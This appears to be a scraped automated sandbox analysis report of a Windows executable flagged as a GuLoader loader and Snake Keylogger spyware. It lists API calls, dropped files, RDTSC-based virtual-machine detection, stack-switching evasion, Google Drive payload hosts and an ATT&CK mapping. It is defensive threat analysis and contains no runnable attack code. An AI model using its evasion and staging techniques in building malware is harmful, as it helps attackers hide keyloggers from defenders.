      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.11:50046 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.11:50048 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.11:50050 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.11:50052 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.11:50054 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.11:50056 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.11:50060 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.11:50062 version: TLS 1.2
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 0_2_0040573B GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040573B
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 0_2_00403552 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403552
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 3_2_00403552 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,3_2_00403552
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeFile created: C:\Windows\Fonts\frostluftenJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeFile created: C:\Windows\Fonts\frostluften\MangrateJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 0_2_00406DE60_2_00406DE6
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 0_2_004075BD0_2_004075BD
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 0_2_73B01BFF0_2_73B01BFF
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 3_2_00406DE63_2_00406DE6
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 3_2_004075BD3_2_004075BD
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: String function: 00402DCB appears 51 times
      Source: QNuQ5e175D.exeStatic PE information: invalid certificate
      Source: QNuQ5e175D.exe, 00000000.00000002.1533357258.0000000000468000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameclanfellow tangleberry.exe4 vs QNuQ5e175D.exe
      Source: QNuQ5e175D.exe, 00000003.00000002.2559348158.0000000000468000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameclanfellow tangleberry.exe4 vs QNuQ5e175D.exe
      Source: QNuQ5e175D.exeBinary or memory string: OriginalFilenameclanfellow tangleberry.exe4 vs QNuQ5e175D.exe
      Source: QNuQ5e175D.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engineClassification label: mal68.troj.evad.winEXE@3/5@2/2
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 0_2_00403552 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403552
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 3_2_00403552 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,3_2_00403552
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 0_2_004049E7 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004049E7
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 0_2_004021CF CoCreateInstance,0_2_004021CF
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeFile created: C:\Users\user\AppData\Local\skattekodeJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeFile created: C:\Users\user\AppData\Local\Temp\nsd8F6D.tmpJump to behavior
      Source: QNuQ5e175D.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: QNuQ5e175D.exeVirustotal: Detection: 63%
      Source: QNuQ5e175D.exeReversingLabs: Detection: 44%
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeFile read: C:\Users\user\Desktop\QNuQ5e175D.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\QNuQ5e175D.exe "C:\Users\user\Desktop\QNuQ5e175D.exe"
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeProcess created: C:\Users\user\Desktop\QNuQ5e175D.exe "C:\Users\user\Desktop\QNuQ5e175D.exe"
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeProcess created: C:\Users\user\Desktop\QNuQ5e175D.exe "C:\Users\user\Desktop\QNuQ5e175D.exe"Jump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: oleacc.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: QNuQ5e175D.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

      Data Obfuscation

      barindex
      Yara detected GuLoader
      Source: Yara matchFile source: 00000000.00000002.1535894824.000000000446C000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.2559418196.00000000017EC000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 0_2_73B01BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_73B01BFF
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 0_2_73B030C0 push eax; ret 0_2_73B030EE
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeFile created: C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Switches to a custom stack to bypass stack traces
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeAPI/Special instruction interceptor: Address: 4B06ED2
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeAPI/Special instruction interceptor: Address: 1E86ED2
      Tries to detect virtualization through RDTSC time measurements
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeRDTSC instruction interceptor: First address: 4AD9B1D second address: 4AD9B1D instructions: 0x00000000 rdtsc 0x00000002 test bl, cl 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F74F0F9A0D8h 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeRDTSC instruction interceptor: First address: 1E59B1D second address: 1E59B1D instructions: 0x00000000 rdtsc 0x00000002 test bl, cl 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F74F0F9B148h 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe TID: 7992Thread sleep count: 42 > 30Jump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exe TID: 7992Thread sleep time: -420000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 0_2_004068D4 FindFirstFileW,FindClose,0_2_004068D4
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 0_2_00405C83 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C83
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 0_2_00402930 FindFirstFileW,0_2_00402930
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 3_2_00402930 FindFirstFileW,3_2_00402930
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 3_2_004068D4 FindFirstFileW,FindClose,3_2_004068D4
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 3_2_00405C83 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,3_2_00405C83
      Source: QNuQ5e175D.exe, 00000003.00000003.1617239451.0000000003A6F000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1768535254.0000000003A6B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1892630990.0000000003A6B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1757399705.0000000003A6B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1780110033.0000000003A6B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1791818626.0000000003A6B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000002.2562009711.0000000003A08000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1628221931.0000000003A6F000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1745863415.0000000003A6B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1881137157.0000000003A6B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: QNuQ5e175D.exe, 00000003.00000003.1617239451.0000000003A6F000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1768535254.0000000003A6B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1892630990.0000000003A6B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1757399705.0000000003A6B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1780110033.0000000003A6B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1791818626.0000000003A6B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1628221931.0000000003A6F000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1745863415.0000000003A6B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1881137157.0000000003A6B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000002.2562009711.0000000003A61000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW!
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeAPI call chain: ExitProcess graph end nodegraph_0-4195
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeAPI call chain: ExitProcess graph end nodegraph_0-4198
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 0_2_73B01BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_73B01BFF
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeProcess created: C:\Users\user\Desktop\QNuQ5e175D.exe "C:\Users\user\Desktop\QNuQ5e175D.exe"Jump to behavior
      Source: C:\Users\user\Desktop\QNuQ5e175D.exeCode function: 0_2_00403552 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403552

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Native API      		1
      DLL Side-Loading      		1
      Access Token Manipulation      		11
      Masquerading      		OS Credential Dumping21
      Security Software Discovery      		Remote Services1
      Archive Collected Data      		11
      Encrypted Channel      		Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
      Process Injection      		1
      Virtualization/Sandbox Evasion      		LSASS Memory1
      Virtualization/Sandbox Evasion      		Remote Desktop Protocol1
      Clipboard Data      		3
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
      DLL Side-Loading      		1
      Access Token Manipulation      		Security Account Manager2
      File and Directory Discovery      		SMB/Windows Admin SharesData from Network Shared Drive3
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
      Process Injection      		NTDS23
      System Information Discovery      		Distributed Component Object ModelInput Capture14
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Deobfuscate/Decode Files or Information      		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
      Obfuscated Files or Information      		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
      DLL Side-Loading      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      QNuQ5e175D.exe64%VirustotalBrowse
      QNuQ5e175D.exe45%ReversingLabsWin32.Spyware.Snakekeylogger

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\nsj924C.tmp\System.dll0%VirustotalBrowse

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      No Antivirus matches

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      drive.google.com
      		172.217.16.142
      		truefalse
        		high
        drive.usercontent.google.com
        		142.250.184.225
        		truefalse
          		high

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://www.google.comQNuQ5e175D.exe, 00000003.00000002.2562009711.0000000003A61000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1628142286.0000000003A7B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2037793311.0000000003A7A000.00000004.00000020.00020000.00000000.sdmpfalse
            		high
            https://drive.usercontent.google.com/QNuQ5e175D.exe, 00000003.00000003.1892630990.0000000003A57000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1847687586.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1903523473.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1825678658.0000000003A80000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2138998807.0000000003A7A000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1813958035.0000000003A81000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1617206388.0000000003A7B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1642477593.0000000003A81000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2468233736.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1892606488.0000000003A80000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1858349107.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1690308078.0000000003A7B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1993229355.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1847731615.0000000003A81000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1605210077.0000000003A81000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1768510854.0000000003A81000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1735078700.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1712715094.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2071438083.0000000003A7B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2093555969.0000000003A7B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1870054618.0000000003A81000.00000004.00000020.00020000.00000000.sdmpfalse
              		high
              https://drive.usercontent.google.com/ZQNuQ5e175D.exe, 00000003.00000003.2127459901.0000000003A7A000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2149994791.0000000003A7A000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1642418562.0000000003A7B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1881033712.0000000003A82000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1925981246.0000000003A81000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1937805348.0000000003A81000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1948379458.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1847687586.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1903523473.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1825678658.0000000003A80000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2138998807.0000000003A7A000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1813958035.0000000003A81000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1617206388.0000000003A7B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1642477593.0000000003A81000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.2468233736.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1892606488.0000000003A80000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1858349107.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1690308078.0000000003A7B000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1993229355.0000000003A79000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1847731615.0000000003A81000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000003.00000003.1605210077.0000000003A81000.00000004.00000020.00020000.00000000.sdmpfalse
